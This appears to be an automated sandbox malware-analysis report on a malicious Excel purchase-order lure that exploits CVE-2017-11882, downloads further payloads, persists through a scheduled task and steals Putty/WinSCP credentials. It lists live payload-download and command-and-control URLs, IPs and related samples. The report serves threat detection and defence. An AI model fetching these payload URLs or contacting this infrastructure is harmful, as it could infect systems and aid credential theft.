6 other processes 40->53 file21 signatures22 process23 dnsIp24 83 prolinice.ga 45->83 135 System process connects to network (likely due to code injection or exploit) 45->135 137 Found evasive API chain (may stop execution after checking mutex) 45->137 139 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 45->139 141 4 other signatures 45->141 signatures25

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            40830001.xls26%ReversingLabsDocument-Word.Downloader.SLoad
            40830001.xls9%VirustotalBrowse
            40830001.xls100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{21E9ADCA-4DF6-4ACD-96FE-092206FC804F}.tmp100%AviraEXP/CVE-2017-11882.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Roaming\dagifhd0%ReversingLabs
            C:\Users\user\AppData\Roaming\dagifhd0%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            crash.sh3%VirustotalBrowse
            ia803104.us.archive.org1%VirustotalBrowse
            prolinice.ga16%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            http://www.mozilla.com00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg100%URL Reputationmalware
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://support.mozilla.org0%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://crash.sh/udMVqm0%Avira URL Cloudsafe
            http://wrbvhkkkwfg.com/0%Avira URL Cloudsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            http://prolinice.ga/ndex.php0%Avira URL Cloudsafe
            https://ia803104.us.archive.org0%Avira URL Cloudsafe
            http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc0%Avira URL Cloudsafe
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF0%Avira URL Cloudsafe
            https://ia803104.us.archive.org1%VirustotalBrowse
            http://prolinice.ga/ndex.php1%VirustotalBrowse
            http://www.autoitscript.com/autoit30%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
            http://prolinice.ga/index.php100%Avira URL Cloudmalware
            https://crash.sh/udMVqm0%VirustotalBrowse
            http://vilendar.ga/index.php100%Avira URL Cloudmalware
            https://ia803104.us.archive.org/27/items/vbs_20240LR0%Avira URL Cloudsafe
            http://www.piriform.com/ccleanerxe0%Avira URL Cloudsafe
            http://prolinice.ga/0%Avira URL Cloudsafe
            http://www.autoitscript.com/autoit30%VirustotalBrowse
            http://wrbvhkkkwfg.com/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
            https://ia803104.us.archive.org/27/items/vbs_20240LR1%VirustotalBrowse
            http://vilendar.ga/index.php17%VirustotalBrowse
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj1%VirustotalBrowse
            http://prolinice.ga/index.php19%VirustotalBrowse
            https://www.google.com/favicon.ico0%Avira URL Cloudsafe
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF1%VirustotalBrowse
            http://java.sun.com0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
            http://prolinice.ga/16%VirustotalBrowse
            http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc1%VirustotalBrowse
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%Avira URL Cloudsafe
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
            http://java.sun.com0%VirustotalBrowse
            https://crash.sh/0%Avira URL Cloudsafe
            http://23.94.148.160%Avira URL Cloudsafe
            http://www.piriform.com/ccleaner0%Avira URL Cloudsafe
            https://www.google.com/favicon.ico0%VirustotalBrowse
            http://23.94.148.16/90/WEFV.txt0%Avira URL Cloudsafe
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.01%VirustotalBrowse
            https://crash.sh/udMVqmyX0%Avira URL Cloudsafe
            http://23.94.148.160%VirustotalBrowse
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%VirustotalBrowse
            http://prolinice.ga/index.phpMozilla/5.00%Avira URL Cloudsafe
            http://www.piriform.com/ccleaner0%VirustotalBrowse
            https://crash.sh/udMVqm--C0%Avira URL Cloudsafe
            http://23.94.148.16/90/WEFV.txt1%VirustotalBrowse
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
            https://crash.sh/2%VirustotalBrowse
            http://prolinice.ga/index.phpMozilla/5.01%VirustotalBrowse
            https://crash.sh/udMVqmyX3%VirustotalBrowse
            https://crash.sh/udMVqm--C0%VirustotalBrowse
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            crash.sh
            208.64.171.230
            truetrueunknown
            ia803104.us.archive.org
            207.241.232.154
            truetrueunknown
            prolinice.ga
            185.251.91.119
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            https://crash.sh/udMVqmfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doctrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFtrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgtrue
            • URL Reputation: malware
            unknown
            http://prolinice.ga/index.phptrue
            • 19%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://vilendar.ga/index.phptrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://23.94.148.16/90/WEFV.txttrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabexplorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drfalse
            • URL Reputation: safe
            unknown
            http://prolinice.ga/ndex.phpexplorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmptrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://duckduckgo.com/ac/?q=explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drfalse
            • URL Reputation: safe
            unknown
            http://wrbvhkkkwfg.com/explorer.exe, 0000000F.00000002.626188065.0000000007B6D000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://ia803104.us.archive.orgpowershell.exe, 0000000D.00000002.453954500.000000000231B000.00000004.00000800.00020000.00000000.sdmptrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://ocsp.entrust.net03powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Licensepowershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.mozilla.com0explorer.exe, 0000000F.00000000.464950376.0000000003B98000.00000004.00000010.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFjEQNEDT32.EXE, 00000009.00000002.438240089.00000000005FE000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.autoitscript.com/autoit3explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://ocsp.entrust.net0Dpowershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.457563315.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.453954500.00000000021E1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://ia803104.us.archive.org/27/items/vbs_20240LRpowershell.exe, 0000000B.00000002.457563315.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.piriform.com/ccleanerxeexplorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://crl.entrust.net/server1.crl0powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://prolinice.ga/explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmptrue
            • 16%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drfalse
            • URL Reputation: safe
            unknown
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchexplorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drfalse
            • URL Reputation: safe
            unknown
            http://wrbvhkkkwfg.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000F.00000002.626188065.0000000007B6D000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.google.com/favicon.ico7947.tmp.19.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drfalse
            • URL Reputation: safe
            unknown
            http://java.sun.comexplorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000F.00000000.465313986.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007AA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.465011761.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625742820.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmptrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://crash.sh/crash.sh.url.4.drfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://23.94.148.16powershell.exe, 0000000D.00000002.453954500.000000000243A000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.piriform.com/ccleanerexplorer.exe, 0000000F.00000000.465313986.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007AA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.465011761.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625742820.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://crash.sh/udMVqmyX96630000.0.dr, ~DF5F0CCF6F4019BF3C.TMP.0.drfalse
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://support.mozilla.orgexplorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://prolinice.ga/index.phpMozilla/5.0explorer.exe, 00000013.00000002.514628656.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.507625773.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.510291767.0000000000644000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.624681421.0000000000474000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.624657376.00000000002CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.624815942.0000000000594000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.624601316.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.624734588.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.624623660.000000000015E000.00000004.00000020.00020000.00000000.sdmptrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://secure.comodo.com/CPS0powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drfalse
            • URL Reputation: safe
            unknown
            https://crash.sh/udMVqm--C40830001.xlsfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            207.241.232.154
            ia803104.us.archive.orgUnited States
            7941INTERNET-ARCHIVEUStrue
            208.64.171.230
            crash.shUnited States
            30600AS-CMNUStrue
            23.94.148.16
            unknownUnited States
            36352AS-COLOCROSSINGUStrue
            185.251.91.119
            prolinice.gaRussian Federation
            35278SPRINTHOSTRUtrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1502223
            Start date and time:2024-08-31 15:49:42 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 31s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:29
            Number of new started drivers analysed:1
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • GSI enabled (VBA)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:40830001.xls
            renamed because original name is a hash value
            Original Sample Name: TO _SC13060P-CS_19 6 PO()POTWN#P20240830001.xls
            Detection:MAL
            Classification:mal100.bank.troj.spyw.expl.evad.winXLS@32/34@13/4
            EGA Information:
            • Successful, ratio: 80%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 134
            • Number of non-executed functions: 93
            Cookbook Comments:
            • Found application associated with file extension: .xls
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Active ActiveX Object
            • Scroll down
            • Close Viewer
            • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe, svchost.exe
            • Execution Graph export aborted for target EQNEDT32.EXE, PID 3996 because there are no executed function
            • Execution Graph export aborted for target dagifhd, PID 1216 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 2984 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            06:51:42Task SchedulerRun new task: Firefox Default Browser Agent 7553EB618C6629DD path: C:\Users\user\AppData\Roaming\dagifhd
            09:51:12API Interceptor37x Sleep call for process: EQNEDT32.EXE modified
            09:51:13API Interceptor7x Sleep call for process: wscript.exe modified
            09:51:14API Interceptor79x Sleep call for process: powershell.exe modified
            09:51:27API Interceptor3354x Sleep call for process: explorer.exe modified
            09:51:42API Interceptor225x Sleep call for process: taskeng.exe modified
            09:51:43API Interceptor1x Sleep call for process: dagifhd modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            207.241.232.154inv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
              RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                RFQ -PO-SMT290824.xlsGet hashmaliciousRemcosBrowse
                  SI_56127.vbsGet hashmaliciousRemcosBrowse
                    CAN_POST2617276.vbsGet hashmaliciousRemcosBrowse
                      CAN_POST7865678.vbsGet hashmaliciousAsyncRATBrowse
                        Sepco RFQ.xlsGet hashmaliciousRemcosBrowse
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtfGet hashmaliciousRemcosBrowse
                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.24787.2174.rtfGet hashmaliciousRemcosBrowse
                              PMT-INV0230824AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                208.64.171.230Paul Meeting Proposal and Schedule.xlsGet hashmaliciousFormBookBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  prolinice.ga#20240627_Edlen_B.xlsGet hashmaliciousSmokeLoaderBrowse
                                  • 77.232.129.190
                                  171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                  • 77.232.129.190
                                  #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                                  • 77.232.129.190
                                  ia803104.us.archive.orginv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 207.241.232.154
                                  RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  RFQ -PO-SMT290824.xlsGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  SI_56127.vbsGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  CAN_POST2617276.vbsGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  CAN_POST7865678.vbsGet hashmaliciousAsyncRATBrowse
                                  • 207.241.232.154
                                  Sepco RFQ.xlsGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtfGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.24787.2174.rtfGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  PMT-INV0230824AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  crash.shPaul Meeting Proposal and Schedule.xlsGet hashmaliciousFormBookBrowse
                                  • 208.64.171.230
                                  https://protect-eu.mimecast.com/s/ps2yCL7ZzTEr6KVUPRpdf?domain=youtube.comGet hashmaliciousUnknownBrowse
                                  • 137.184.218.116
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  AS-CMNUSPaul Meeting Proposal and Schedule.xlsGet hashmaliciousFormBookBrowse
                                  • 208.64.171.230
                                  zisD7MC388.elfGet hashmaliciousMiraiBrowse
                                  • 199.66.82.92
                                  8gJ5wLVFMQ.elfGet hashmaliciousMiraiBrowse
                                  • 172.87.18.44
                                  huhu.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 217.180.232.5
                                  i586.elfGet hashmaliciousMiraiBrowse
                                  • 69.174.140.74
                                  m1vvw0vLkD.elfGet hashmaliciousMiraiBrowse
                                  • 69.174.140.62
                                  jUXLsJHqkS.elfGet hashmaliciousMiraiBrowse
                                  • 69.174.164.74
                                  kpYawcK42x.elfGet hashmaliciousMiraiBrowse
                                  • 162.211.35.109
                                  nF83DvSCoH.elfGet hashmaliciousMiraiBrowse
                                  • 69.174.140.77
                                  uuCAncltoX.elfGet hashmaliciousMiraiBrowse
                                  • 199.66.82.98
                                  SPRINTHOSTRU2ZJuaB7CQ4.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.194.149
                                  5P9EdUgv5r.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.194.149
                                  06wRHV3NYY.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.192.103
                                  bfderfg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  • 141.8.197.42
                                  YMtjYvZX2i.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.197.42
                                  p7oBHwDt23.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.197.42
                                  pxkGBmsm1Y.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.193.236
                                  N7lmWFMEgx.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.192.126
                                  X1BQ0d74HR.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.197.42
                                  KE4FVpmbfO.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.192.151
                                  INTERNET-ARCHIVEUSINQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.jsGet hashmaliciousAgentTeslaBrowse
                                  • 207.241.227.86
                                  inv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 207.241.232.154
                                  Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.jsGet hashmaliciousAgentTeslaBrowse
                                  • 207.241.227.86
                                  RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  RFQ -PO-SMT290824.xlsGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  SI_56127.vbsGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  CAN_POST2617276.vbsGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  CAN_POST7865678.vbsGet hashmaliciousAsyncRATBrowse
                                  • 207.241.232.154
                                  Sepco RFQ.xlsGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtfGet hashmaliciousRemcosBrowse
                                  • 207.241.232.154
                                  AS-COLOCROSSINGUSrAwGQLtWJr.exeGet hashmaliciousRemcosBrowse
                                  • 23.95.60.82
                                  inv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 107.175.229.146
                                  SALKI098765R400.exeGet hashmaliciousRemcosBrowse
                                  • 192.210.150.26
                                  RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                  • 198.46.178.181
                                  RFQ -PO-SMT290824.xlsGet hashmaliciousRemcosBrowse
                                  • 192.3.140.102
                                  RFQ_0020829024SEPT.xla.xlsxGet hashmaliciousUnknownBrowse
                                  • 198.46.178.181
                                  Sepco RFQ.xlsGet hashmaliciousRemcosBrowse
                                  • 192.3.193.155
                                  Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                  • 107.172.31.21
                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtfGet hashmaliciousRemcosBrowse
                                  • 198.46.178.181
                                  BP-30M31_20240829_093844.exeGet hashmaliciousRemcosBrowse
                                  • 192.3.243.155
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  05af1f5ca1b87cc9cc9b25185115607dinv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 208.64.171.230
                                  • 207.241.232.154
                                  RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
                                  • 207.241.232.154
                                  RFQ -PO-SMT290824.xlsGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
                                  • 207.241.232.154
                                  RFQ_0020829024SEPT.xla.xlsxGet hashmaliciousUnknownBrowse
                                  • 208.64.171.230
                                  • 207.241.232.154
                                  Sepco RFQ.xlsGet hashmaliciousRemcosBrowse
                                  • 208.64.171.230
